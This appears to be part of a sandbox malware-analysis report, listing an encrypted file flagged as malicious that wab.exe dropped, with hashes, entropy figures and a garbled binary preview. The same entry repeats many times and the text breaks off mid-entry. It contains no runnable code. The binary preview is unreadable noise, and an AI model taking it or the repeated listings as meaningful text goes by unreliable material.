                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
